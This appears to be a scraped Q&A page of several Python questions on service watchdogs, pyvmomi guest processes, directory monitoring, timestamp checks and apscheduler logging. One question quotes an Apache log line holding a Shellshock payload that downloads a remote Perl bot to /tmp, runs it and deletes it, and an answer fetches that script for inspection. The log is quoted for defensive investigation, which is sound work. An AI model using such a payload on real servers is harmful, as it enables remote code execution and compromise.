Python: service dies but PID remains; log file updates every minute

I have a service that, as the title says, dies and leaves a stale PID behind. This particular service logs every minute, so I want to create a Python script that checks the log file's modified time and, if the file has not been updated in, say, 3 minutes, restarts the service.
I am new to scripting/programming, so I need help with the logic here, please.
This is what I have so far to check the file age:
#!/usr/bin/python
from os import path
from datetime import datetime, timedelta

#file = "/var/log/file.log"

def check_file(seconds, file_name):
    try:
        # cutoff: the oldest acceptable modification time
        time_diff = datetime.now() - timedelta(seconds=seconds)
        # getmtime() is the last modification time; getctime() is metadata-change
        # time on Linux, which is not what we want here
        file_time = datetime.fromtimestamp(path.getmtime(file_name))
        if file_time < time_diff:
            # stale: not updated within the window
            return [True, "File: %s. Older than: %s, file_time: %s, time_diff: %s" % (file_name, seconds, file_time, time_diff)]
        else:
            return [False, "File: %s. Newer than: %s, file_time: %s, time_diff: %s" % (file_name, seconds, file_time, time_diff)]
    except Exception as e:
        return [False, e]

Before writing custom code to handle this problem (and then having two problems), I'd look at:
fixing the service itself so that it doesn't die,
adding monitoring to that service at the box level (see this for example).
If neither option is practical, I would start with a bash-based solution rather than Python.
In either case, you'll need to make sure that the restarting script doesn't die either.
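If you do go the Python route anyway, a minimal sketch of the whole check-and-restart loop might look like this (the log path, service name, and restart command are illustrative assumptions; on a systemd box you'd call systemctl instead):

#!/usr/bin/python
import subprocess
import time
from os import path

LOG_FILE = "/var/log/file.log"  # assumed log path
MAX_AGE = 180                   # 3 minutes, in seconds

def restart_service():
    # assumes a SysV-style init; on systemd use: systemctl restart myservice
    subprocess.call(["service", "myservice", "restart"])

while True:
    # seconds since the log was last modified
    age = time.time() - path.getmtime(LOG_FILE)
    if age > MAX_AGE:
        restart_service()
    time.sleep(60)  # re-check once a minute

Run it from a supervisor (or cron with a lock) so the watcher itself gets restarted if it dies.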

Related

Executing program via pyvmomi creates a process, but nothing happens after that

I'm studying vCenter 6.5 and community samples help a lot, but in this particular situation I can't figure out what's going on. The script:
from __future__ import with_statement
import atexit
from tools import cli
from pyVim import connect
from pyVmomi import vim, vmodl

def get_args():
    # *Boring args parsing works*
    return args

def main():
    args = get_args()
    try:
        service_instance = connect.SmartConnectNoSSL(host=args.host,
                                                     user=args.user,
                                                     pwd=args.password,
                                                     port=int(args.port))
        atexit.register(connect.Disconnect, service_instance)
        content = service_instance.RetrieveContent()
        vm = content.searchIndex.FindByUuid(None, args.vm_uuid, True)
        creds = vim.vm.guest.NamePasswordAuthentication(
            username=args.vm_user, password=args.vm_pwd
        )
        try:
            pm = content.guestOperationsManager.processManager
            ps = vim.vm.guest.ProcessManager.ProgramSpec(
                programPath=args.path_to_program,
                arguments=args.program_arguments
            )
            res = pm.StartProgramInGuest(vm, creds, ps)
            if res > 0:
                print "Program executed, PID is %d" % res
        except IOError as e:
            print e
    except vmodl.MethodFault as error:
        print "Caught vmodl fault : " + error.msg
        return -1
    return 0

# Start program
if __name__ == "__main__":
    main()
When I execute it in the console, it successfully connects to the target virtual machine and prints
Program executed, PID is 2036
In the task manager I see a process with the mentioned PID, created by the correct user, but there is no GUI for the process (calc.exe), and right-clicking does not offer to "Expand" the process.
I suppose this process was created with special parameters, maybe in a different session.
In addition, I tried to run a batch file to check whether it actually executes, and the answer is no: the batch file does not execute.
Any help, advice, or clues would be awesome.
P.S. I tried other scripts and successfully transferred a file to the VM.
P.P.S. Sorry for my English.
Update: all such processes start in session 0.
Have you tried interactiveSession?
https://github.com/vmware/pyvmomi/blob/master/docs/vim/vm/guest/GuestAuthentication.rst
This boolean argument is passed to NamePasswordAuthentication and means the following:
This is set to true if the client wants an interactive session in the guest.
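In the script above, that would mean building the credentials like this (a sketch based on the linked docs):

creds = vim.vm.guest.NamePasswordAuthentication(
    username=args.vm_user,
    password=args.vm_pwd,
    interactiveSession=True  # ask for the interactive (console) user's session rather than session 0
)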

A python script to monitor a directory for new files

Similar questions have been asked, but they either did not work for me or I failed to understand the answers.
I run an Apache2 web server and host a few petty personal sites. I am being cyberstalked, or someone is attempting to hack me.
The Apache2 access log shows
195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");'"
which is clearly attempting (over and over again in my logs) to force my server to download cox.pl, run it, and then remove it.
I really want to know what is in cox.pl, which could be a modified version of Cox-Data-Usage on GitHub.
I would like a script that constantly monitors my /tmp folder and, when a new file is added, copies that file to another directory so I can see what it is doing, or at least attempting to do.
I know I could just deny access, etc., but I want to find out what these hackers are trying to do and see if I can gather intel about them.
The script in question can be easily downloaded; it contains ShellBOT by devil__, so... guess ;-)
You could use tutorial_notifier.py from pyinotify, but there's no need for it in this particular case. Just do
curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt
to check the script.
It looks like a suite of exploits for Linux 2.4.17 - 2.6.17 and maybe BSD, IRC-related and not at all harmless. It has nothing to do with Cox-Data-Usage.
The solution to the question wouldn't lie in a Python script; this is more of a security issue for the likes of Fail2ban or similar to handle. But there is a way to monitor a directory for changes using Python Watchdog (pip install watchdog).
Taken from: https://pythonhosted.org/watchdog/quickstart.html#a-simple-example
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler

if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s - %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S')
    path = sys.argv[1] if len(sys.argv) > 1 else '.'
    event_handler = LoggingEventHandler()
    observer = Observer()
    observer.schedule(event_handler, path, recursive=True)
    observer.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()
This will log all changes (it can be configured for just file creation, as sketched below).
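For creation-only events, subclass FileSystemEventHandler instead of using LoggingEventHandler (a minimal sketch using the same watchdog API):

from watchdog.events import FileSystemEventHandler

class CreatedHandler(FileSystemEventHandler):
    def on_created(self, event):
        # called for new files and directories; skip directories
        if not event.is_directory:
            print("New file: %s" % event.src_path)

Schedule an instance of it on the Observer exactly as above.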
If you want to rename new files to something else, you first need to know that the file is free, i.e. it has finished downloading/being created, or any modification will fail. That can also mean a request for that file arrives before you've moved or renamed it programmatically. That's why this isn't a complete solution.
Here are a couple of solutions.
Solution 1 (CPU usage: 27.9%, approx. 30%):
import os

path_to_watch = "your/path"
print('Your folder path is "', path_to_watch, '"')
before = dict([(f, None) for f in os.listdir(path_to_watch)])
while 1:
    after = dict([(f, None) for f in os.listdir(path_to_watch)])
    added = [f for f in after if f not in before]
    if added:
        print("Added: ", ", ".join(added))
        break
    else:
        before = after
I have edited the code; the original is available at http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html
The original code was written for Python 2, so you need to convert it to Python 3.
Note: whenever you add a file to the watched path, the script prints the added names and breaks; as long as no files are added, it keeps running.
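Most of that CPU goes to the tight while loop; a short sleep between directory polls (same loop, sketched below) cuts the usage to near zero:

import time

while 1:
    after = dict([(f, None) for f in os.listdir(path_to_watch)])
    added = [f for f in after if f not in before]
    if added:
        print("Added: ", ", ".join(added))
        break
    before = after
    time.sleep(1)  # yield the CPU between polls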
Solution 2 (CPU usage: 23.4%, approx. 20%):
import os

path = r'C:\Users\Faraaz Anas Ammaar\Documents\Programming\Python\Eye-Daemon'
b = os.listdir(path)
path_len_org = len(b)

def file_check():
    # poll until the directory entry count changes
    while 1:
        b = os.listdir(path)
        path_len_final = len(b)
        if path_len_org < path_len_final:
            return "A file is added"
        elif path_len_org > path_len_final:
            return "A file is removed"

print(file_check())

Python/bash wget file and see if contents matches unix timestamp

Scenario
On a web server, a user hits execute, which produces a file called now.txt containing the current Unix timestamp.
On the client machines I need a way to check whether that file's timestamp is within 5 minutes of the current time and, if so, execute another command.
I was thinking of having a cron job run on the client machine every 5 minutes that does a wget of the file from the web server, reads the Unix timestamp from its contents, and compares it with the current time.
Not sure if that makes sense, and not sure if I have over-egged it, so it would be good to get some advice.
Python script:
wget the file
check the file is within 5 minutes of the current time
run another command
import wget
from datetime import datetime

url = 'http://example.com/test/now.txt'
filename = wget.download(url)
try:
    f = open("now.txt", "rb")
    # long() is Python 2; use int() on Python 3
    age = datetime.utcnow() - datetime.utcfromtimestamp(long(f.read()))
except:
    pass
To read a Unix timestamp saved in a remote file and compare it with the current time on the client (assuming the clocks are synchronized, e.g., using ntp):
#!/usr/bin/env python3
import time
from urllib.request import urlopen

with urlopen('http://example.com/test/now.txt') as r:
    timestamp = int(r.read())

if abs(time.time() - timestamp) < 300:
    print('the current time is within 5 minutes')
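To cover step 3 ("run another command"), the if branch can shell out; a sketch, with the command itself as a placeholder:

import subprocess

if abs(time.time() - timestamp) < 300:
    # placeholder command; substitute whatever should run when the file is fresh
    subprocess.check_call(['/usr/local/bin/some-command'])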

How much CPU should a Python time.sleep(n) call use

I have a programme running on an old laptop which constantly monitors a Dropbox folder for new files. When it's running, the Python process uses close to 50% of the CPU on a dual-core machine and about 12% on an 8-core machine (which suggests it's using close to 100% of one core). This is giving off a lot of heat.
The relevant bit of code is:
while True:
    files = dict([(f, None) for f in os.listdir(path_to_watch)])
    if len(files) > 0:
        print "You have %s new file/s!" % len(files)
        time.sleep(20)
In the case that there is no new file, surely most of the time should be spent waiting in time.sleep(), which I wouldn't have thought would be CPU-intensive, and the answers here seem to say it shouldn't be.
So, two questions:
1) Since time.sleep() shouldn't be so CPU-intensive, what is going on here?
2) Is there another way of monitoring a folder for changes that would run cooler?
1) Your sleep only gets called when there are new files.
This should be much better:
while True:
    files = dict([(f, None) for f in os.listdir(path_to_watch)])
    if len(files) > 0:
        print "You have %s new file/s!" % len(files)
    time.sleep(20)
2) Yes, especially if you're using Linux. Gamin would be something I'd recommend looking into. Example:
import gamin
import time

mydir = "/path/to/watch"

def callback(path, event):
    global mydir
    try:
        if event == gamin.GAMCreated:
            print "New file detected: %s" % (path)
            fullname = mydir + "/" + path
            print "Going to read", fullname
            data = open(fullname).read()
            print "Going to upload", fullname
            rez = upload_file(data, path)  # upload_file is the answerer's own helper
            print "Response from uploading was", rez
    except Exception as e:  # not good practice
        print e
        import pdb
        pdb.set_trace()

mon = gamin.WatchMonitor()
mon.watch_directory(mydir, callback)
time.sleep(1)
while True:
    ret = mon.handle_one_event()
mon.stop_watch(mydir)  # unreachable as written; the loop above never exits
del mon
There is also a cross-platform API for monitoring file system changes: Watchdog (see the example in the previous question).

How to specify 'logger' for apscheduler

I'm trying to learn how to use Python's apscheduler package, but periodically, it throws the following error:
No handlers could be found for logger "apscheduler.scheduler"
This message seems to be associated with errors in the scheduled jobs. For example, with jobTester as the scheduled job, the following code, which uses an undefined variable (nameStr0) in jobTester, gives the above error message:
from apscheduler.scheduler import Scheduler
from apscheduler.jobstores.shelve_store import ShelveJobStore
from datetime import datetime, timedelta
from schedJob import toyJob

def jobTester(nameStr):
    outFileName = nameStr0 + '.txt'  # nameStr0 is undefined: this is the bug that triggers the logger message
    outFile = open(outFileName, 'w')
    outFile.write(nameStr)
    outFile.close()

def schedTester(jobList):
    scheduler = Scheduler()
    scheduler.add_jobstore(ShelveJobStore('example.db'), 'shelve')
    refTime = datetime.now()
    for index, currJob in enumerate(jobList):
        runTime = refTime + timedelta(seconds=15)
        jobName = currJob.name + '_' + str(index)
        scheduler.add_date_job(jobTester, runTime, name=jobName,
                               jobstore='shelve', args=[jobName])
    scheduler.start()
    stopTime = datetime.now() + timedelta(seconds=45)
    print "Starting wait loop .....",
    while stopTime > datetime.now():
        pass
    print "Done"

def doit():
    names = ['Alan', 'Barbara', 'Charlie', 'Dana']
    jobList = [toyJob(n) for n in names]
    schedTester(jobList)
This may be seen by running this code (stored in the file schedTester.py) as follows:
>>> import schedTester
>>> schedTester.doit()
No handlers could be found for logger "apscheduler.scheduler"
Starting wait loop ..... Done
However, when I replace nameStr0 with nameStr (i.e., the proper spelling of the variable name), the code runs fine without the error message.
How do I create a logger for apscheduler.scheduler? Am I missing something in the section of the docs dealing with configuring the scheduler?
Am I correct in thinking of this logger as some sort of stderr? If so, where will I look for it (if that is not determined by the way I set it up)?
You can just create a default logger and everything should go to it:
import logging
logging.basicConfig()
The reason you only have a problem when you use a variable that hasn't been defined is that this makes the jobTester function throw an error, which apscheduler catches and tries to report with logging.error(). Since you haven't set up the logger, it complains.
If you read up on python logging you will see that there are many ways to configure it. You could have it log everything to a file or print it to stdout.
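For example, to send everything (including apscheduler's messages) to a file instead, a minimal sketch (the file name is illustrative):

import logging

logging.basicConfig(
    filename='scheduler.log',  # illustrative log file name
    level=logging.DEBUG,
    format='%(asctime)s %(name)s %(levelname)s: %(message)s'
)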
